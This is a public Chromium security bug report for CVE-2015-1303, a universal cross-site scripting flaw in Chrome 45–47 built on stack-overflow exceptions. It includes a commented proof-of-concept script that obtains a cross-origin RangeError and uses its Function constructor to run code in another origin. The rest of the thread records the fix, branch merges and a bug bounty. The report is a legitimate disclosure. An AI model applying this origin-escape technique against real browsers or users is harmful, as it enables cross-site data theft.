
Issue 530301


Issue metadata

Status: Fixed
Closed: Sep 2015
OS: All
Pri: 1
Type: Bug-Security




Security: Universal XSS using stack overflow exceptions

Reported by marius.mlynski@gmail.com, Sep 10 2015

Issue description

VULNERABILITY DETAILS
When the maximum call stack size is exceeded, a RangeError object is created using the isolate's current context. Thus, if a cross-origin context has been entered (through the V8WrapperInstantiationScope constructor, for example), a cross-origin exception will be propagated to the catch handler.

VERSION
Chrome 45.0.2454.85 (Stable)
Chrome 46.0.2490.22 (Beta)
Chrome 47.0.2503.0 (Dev)
Chromium 47.0.2507.0 (Release build compiled today)

REPRODUCTION CASE
<script>
// The child frame starts out as about:blank, which is same-origin with this page.
var i = document.documentElement.appendChild(document.createElement('iframe'));

function g() {
  var w = frames[0];
  function f() {
    // Recurse until the stack is exhausted; the RangeError from the failed call is discarded.
    try { f(); } catch(e) {}
    // Still at the stack limit: wrapping the frame's Location enters the frame's context,
    // so the RangeError raised here is created in the cross-origin context. Keep it.
    try { w.location; } catch(e) { o = e; }
  }
  f();
  // RangeError -> Function of the frame's realm; code compiled with it runs in the frame's origin.
  o.constructor.constructor('alert(location)')();
}

function c() {
  // Poll until the frame has navigated cross-origin (property access throws).
  try { frames[0].a; } catch(e) {
    clearInterval(s);
    g();
  }
}

var s = setInterval(c, 1);
i.src = 'https://abc.xyz';
</script>
Attachment: exploit.html (452 bytes)

Comment 1 by rickyz@chromium.org, Sep 10 2015

Labels: Security_Severity-High Security_Impact-Stable Pri-1 OS-All Cr-Blink-Bindings
Owner: jochen@chromium.org
Nice find!

Comment 2 by ClusterFuzz, Sep 11 2015

Labels: M-45

Comment 4 by jochen@chromium.org, Sep 14 2015

Status: Fixed

Comment 5 by ClusterFuzz, Sep 14 2015

Labels: -Restrict-View-SecurityTeam Merge-Triage M-46 Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix has had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 6 by jochen@chromium.org, Sep 15 2015

Labels: Merge-Request-46
Labels: Merge-Request-45
I would propose merging this to 45 too.

Comment 8 by amin...@google.com, Sep 15 2015

Labels: -Merge-Request-46 -Merge-Request-45 Merge-Approved-46 Merge-Approved-45
Merge approved for M45 branch 2454 and M46 branch 2490.

Comment 9 by jww@chromium.org, Sep 15 2015

Cc: adamk@chromium.org
Labels: -Merge-Triage
Labels: reward-topanel
Labels: CVE-2015-1303 Release-2-M45

Comment 17 by ClusterFuzz, Dec 21 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Labels: -reward-topanel -merge-merged-2454 reward-7500 Merge-Merged-2454 reward-unpaid
Mariusz - $7,500 for this report. We'll add it to your tab.
Labels: -reward-unpaid reward-inprocess

Comment 20 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 21 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted
